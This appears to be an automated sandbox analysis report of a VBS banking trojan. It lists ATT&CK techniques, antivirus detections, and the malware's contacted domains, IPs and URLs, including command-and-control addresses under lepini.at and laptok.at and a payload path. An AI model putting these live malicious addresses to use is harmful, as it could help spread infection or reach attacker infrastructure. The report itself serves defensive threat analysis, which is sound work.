Cloud Accounts	PowerShell1	Network Logon Script	Network Logon Script	Masquerading11	LSA Secrets	Security Software Discovery341	SSH	Keylogging	Data Transfer Size Limits	Proxy1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion5	Cached Domain Credentials	Virtualization/Sandbox Evasion5	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection812	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	System Network Configuration Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\marginal.roq	100%	Avira	TR/Crypt.XDR.Gen
C:\Users\user\AppData\Local\Temp\marginal.roq	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\marginal.roq	69%	ReversingLabs	Win32.Trojan.Razy

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
c56.lepini.at	12%	Virustotal	Browse
api3.lepini.at	11%	Virustotal	Browse
api10.laptok.at	12%	Virustotal	Browse
222.222.67.208.in-addr.arpa	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://c56.lepini.at/s	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://api10.laptok.at/api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
https://contoso.com/Icon	0%	Avira URL Cloud	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://c56.lepini.at//	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://api3.lepini.at/api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b	0%	Avira URL Cloud	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://ns.micro/1	0%	Avira URL Cloud	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://c56.lepini.at:80/jvassets/xI/t64.dat	0%	Avira URL Cloud	safe
http://ns.adobe.cmg	0%	Avira URL Cloud	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
myip.opendns.com	84.17.52.25	true	false		high
c56.lepini.at	47.241.19.44	true	true	12%, Virustotal, Browse	unknown
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	47.241.19.44	true	false	11%, Virustotal, Browse	unknown
api10.laptok.at	47.241.19.44	true	false	12%, Virustotal, Browse	unknown
222.222.67.208.in-addr.arpa	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
https://corp.roblox.com/contact/	RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	false		high
http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1	RuntimeBroker.exe, 00000020.00000003.856750140.000001B4FAF45000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://c56.lepini.at/s	explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://https://file://USER.ID%lu.exe/upd	powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp, control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp, explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp, rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	low
http://www.sogou.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers	explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://rover.ebay.com	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.zhongyicts.com.cn	explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000012.00000002.810095687.000001EF80001000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.roblox.com/develop	RuntimeBroker.exe, 00000020.00000000.821436899.000001B4FAE80000.00000004.00000001.sdmp	false		high
http://www.abril.com.br/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000012.00000003.756510695.000001EF815B0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.naver.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://c56.lepini.at//	explorer.exe, 0000001E.00000000.826232602.000000000A7C9000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000012.00000003.752397998.000001EF81050000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.811569054.000001EF8020F000.00000004.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://suche.t-online.de/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.g5e.com/G5_End_User_License_Supplemental_TermsLC.Hulu	RuntimeBroker.exe, 00000020.00000000.819501769.000001B4FA329000.00000004.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://ns.micro/1	RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rambler.ru/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 0000001E.00000000.827759579.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://c56.lepini.at:80/jvassets/xI/t64.dat	explorer.exe, 0000001E.00000000.826002988.000000000A68A000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://search.ebay.it/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://ns.adobe.cmg	RuntimeBroker.exe, 00000020.00000002.913125750.000001B4F86D9000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 0000001E.00000000.829895180.000000000D9E0000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.241.19.44	unknown	United States		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321602
Start date:	23.11.2020
Start time:	12:17:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2Q4tLHa5wbO1.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	5
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winVBS@31/42@10/2
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 52 Number of non-executed functions: 39
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, rundll32.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 52.255.188.83, 51.104.139.180, 104.83.120.32, 168.61.161.212, 52.155.217.156, 20.54.26.129, 205.185.216.42, 205.185.216.10, 152.199.19.161, 92.122.213.194, 92.122.213.247 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, go.microsoft.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, 